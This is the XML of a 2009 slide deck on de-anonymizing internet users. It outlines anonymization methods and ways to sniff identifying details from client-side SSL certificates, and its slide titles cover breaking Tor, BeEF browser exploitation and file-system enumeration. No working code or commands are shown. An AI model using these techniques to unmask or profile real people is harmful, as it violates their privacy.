            <a:ext cx="2886075" cy="4286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Either Way, Privacy is Broken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0" y="1951037"/>
            <a:ext cx="4887912" cy="56086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The ecosystem is too complex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IP is the “gold standard” for tracking people down on the Internet, but what if we could do better?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Let’s start with the basics of how people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>anonymize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> themselves.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7437" y="2941637"/>
            <a:ext cx="5172075" cy="34480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How2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39712" y="1951037"/>
            <a:ext cx="6400800" cy="5608638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Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>anonymization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> guide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Proxies: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CGI proxies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SOCKS Proxies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Tor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Hacked machines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err="1" smtClean="0"/>
              <a:t>Freemail</a:t>
            </a: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Hotmail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Gmail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err="1" smtClean="0"/>
              <a:t>Hushmail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7" name="Picture 6" descr="My-Civil-Liber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1312" y="2560637"/>
            <a:ext cx="4552535" cy="39404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68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Client Side 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049712" y="1951037"/>
            <a:ext cx="5638800" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit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Good/Normal Use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Improving the trust model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Client: has the cert in the browser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700" dirty="0" smtClean="0"/>
              <a:t>Servers: requires all clients have valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="27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What if the client goes to another website with SSL?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200" dirty="0" smtClean="0"/>
              <a:t>Browser defaults to send the public key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7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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="fail-owned-bike-lock-owner-f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12" y="2179637"/>
            <a:ext cx="3524250" cy="4699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smtClean="0"/>
              <a:t>Client Side Certificates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39712" y="1951037"/>
            <a:ext cx="4953000" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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700" dirty="0" smtClean="0"/>
              <a:t>Well, could this be malicious?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604766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3700" dirty="0" smtClean="0"/>
              <a:t>Sniff the public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Name of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>System/OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Username/Email of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Location of the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Cert Issued / Expires</a:t>
            </a:r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 dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="958779" lvl="1" indent="-453574" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="93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D9B9E-1B6F-400E-AF3A-D2BBDDCE5F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 descr="fireFoxUserIDRe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7512" y="1979612"/>
            <a:ext cx="4400550" cy="4238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712" y="7132637"/>
            <a:ext cx="5551135" cy="27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https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png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11378</TotalTime>
  <Words>913</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>222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Slide 1</vt:lpstr>
      <vt:lpstr>About Us</vt:lpstr>
      <vt:lpstr>De-Anonymizing You!</vt:lpstr>
      <vt:lpstr>Why is Privacy Good?</vt:lpstr>
      <vt:lpstr>Why is Privacy Bad?</vt:lpstr>
      <vt:lpstr>Either Way, Privacy is Broken</vt:lpstr>
      <vt:lpstr>How2</vt:lpstr>
      <vt:lpstr>Client Side Certificates</vt:lpstr>
      <vt:lpstr>Client Side Certificates</vt:lpstr>
      <vt:lpstr>Funny thing about usernames they often look like this:</vt:lpstr>
      <vt:lpstr>Breaking Tor</vt:lpstr>
      <vt:lpstr>Browser Detection</vt:lpstr>
      <vt:lpstr>Virtualization/Cloud Detection</vt:lpstr>
      <vt:lpstr>Pwn Dem v0hns</vt:lpstr>
      <vt:lpstr>BeEF to the MAX!</vt:lpstr>
      <vt:lpstr>Real IP</vt:lpstr>
      <vt:lpstr>File System Enumeration</vt:lpstr>
      <vt:lpstr>Usernames and Computer Names!</vt:lpstr>
      <vt:lpstr>SMBenum</vt:lpstr>
      <vt:lpstr>Google</vt:lpstr>
      <vt:lpstr>Google</vt:lpstr>
      <vt:lpstr>Google</vt:lpstr>
      <vt:lpstr>Google</vt:lpstr>
      <vt:lpstr>Google 0wns Us!</vt:lpstr>
      <vt:lpstr>Questions/Comments?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description>Lilac title area and left border with three blue-green accent elements on left border, gray background</dc:description>
  <cp:lastModifiedBy>Josh Abraham</cp:lastModifiedBy>
  <cp:revision>386</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-08-02T18:30:07Z</dcterms:modified>
</cp:coreProperties>
</file>